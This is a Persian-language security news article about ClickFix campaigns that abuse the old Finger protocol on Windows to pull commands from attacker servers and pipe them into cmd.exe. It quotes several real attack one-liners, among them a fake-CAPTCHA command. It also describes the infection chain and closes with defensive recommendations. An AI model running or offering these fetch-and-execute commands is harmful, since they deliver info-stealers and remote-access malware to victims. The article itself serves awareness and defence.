محققان امنیتی هشدار دادهاند که مهاجمان سایبری دوباره به سراغ پروتکل قدیمی Finger رفتهاند؛ پروتکلی که دههها پیش برای دریافت اطلاعات کاربران در سیستمهای Unix/Linux استفاده میشد و اکنون بهعنوان یک LOLBIN در ویندوز برای اجرای دستورات مخرب بهکار گرفته میشود.
در کمپینهای اخیر ClickFix، فایلهای Batch و دستورات CMD کاربران را فریب میدهند تا فرمانهایی مانند زیر را اجرا کنند:
finger user@finger.<domain> | cmd
ماه گذشته، پژوهشگر امنیتی MalwareHunterTeam یک فایل Batch را (در VirusTotal) با BleepingComputer به اشتراک گذاشت که هنگام اجرا، از دستورfinger root@finger.nateams[.]com
برای دریافت مجموعهای از فرمانها از یک سرور Finger راهدور استفاده میکرد و سپس با لولهکردن خروجی به cmd.exe، آن فرمانها را بهصورت محلی روی سیستم قربانی اجرا میکرد.
در حالی که آن هاست دیگر قابل دسترس نیست، تیم MalwareHunterTeam نمونههای بدافزاری بیشتری پیدا کرده که از فرمان finger در حملات مختلف استفاده میکردند.
برای مثال، اخیراً یک کاربر در Reddit هشدار داد که قربانی یک حمله ClickFix شده؛ حملهای که خودش را بهجای یک Captcha جا زده و کاربر را وادار کرده یک دستور ویندوزی اجرا کند تا «تأیید کند انسان است».
در پست او آمده بود:
«من گول verify you are human رو خوردم و Win + R زدم. حالا باید چیکار کنم؟»
او توضیح داده بود که عجله داشته و در نهایت این دستور را در CMD وارد کرده است:
cmd /c start "" /min cmd /c "finger vke@finger.cloudmega[.]org | cmd" && echo 'Verify you are human--press ENTER'
اگرچه آن هاست دیگر پاسخ درخواستهای finger را نمیدهد، یک کاربر دیگر Reddit خروجی آن را ضبط کرده بود.
در این حمله، از پروتکل Finger بهعنوان یک روش ارسال اسکریپت از راه دور سوءاستفاده میشود؛ به این صورت که اجرای دستورfinger vke@finger.cloudmega[.]org
خروجی سرور را مستقیماً به cmd.exe لوله میکند.
این باعث میشود فرمانهای دریافتی روی سیستم قربانی اجرا شوند. این دستورات یک مسیر با نام تصادفی ایجاد میکنند، فایل curl.exe را با نامی تصادفی کپی میکنند، سپس با استفاده از همان curl تغییرنامدادهشده، یک فایل ZIP که ظاهر PDF دارد را از cloudmega[.]org دانلود میکنند و در نهایت یک پکیج بدافزاری نوشتهشده با Python را استخراج میکنند.
سپس برنامهی Python با استفاده از دستورpythonw.exe __init__.py
اجرا میشود.
آخرین فرمانی که اجرا میشود، یک درخواست بازگشتی به سرور مهاجم است تا موفقیت اجرای عملیات را تأیید کند؛ در حالی که روی صفحهی قربانی یک پیام جعلی با عنوان “Verify you are human” نمایش داده میشود.
هدف دقیق پکیج Python مشخص نیست، اما یک فایل batch مرتبط نشان میدهد که این بدافزار احتمالاً یک info-stealer بوده است.
MalwareHunterTeam همچنین یک کمپین مشابه دیگر پیدا کرده است که از دستورfinger Kove2@api.metrics-strange.com | cmd
برای دریافت و اجرای فرمانهایی استفاده میکند که تقریباً با حمله ClickFix ذکرشده قبلی یکسان هستند.
جمع بندی نحوه کار حمله:
نمایش پیام جعلی «Verify you are human»
فریب کاربر برای اجرای یک دستور CMD
اتصال به یک سرور Finger تحت کنترل مهاجم
دریافت و اجرای دستورات شامل:
‣ ساخت مسیرهای تصادفی
‣ کپی و تغییرنام curl
‣ دانلود فایل ZIP جعلی (PDF نما)
‣ استخراج و اجرای بدافزار (Python-based یا NetSupport Manager RAT)اجرای callback به سرور مهاجم پس از آلودگی
در نسخههای جدیدتر این کمپین، مهاجمان قبل از اجرا، ابزارهای مانیتورینگ و تحلیل مانند Wireshark، Process Hacker، IDA، ProcMon، Fiddler، x64dbg و… را شناسایی میکنند و اگر وجود داشته باشد، اجرای حمله را متوقف میکنند.
توصیهها:
بستتن ترافیک خروجی TCP/79 برای جلوگیری از ارتباطات Finger
آموزش کاربران درباره حملات ClickFix و پیامهای “Verify you are human”
مانیتورینگ رفتارهایی مثل اجرای Finger در لاگها (که اصولاً رفتاری غیرعادی است)
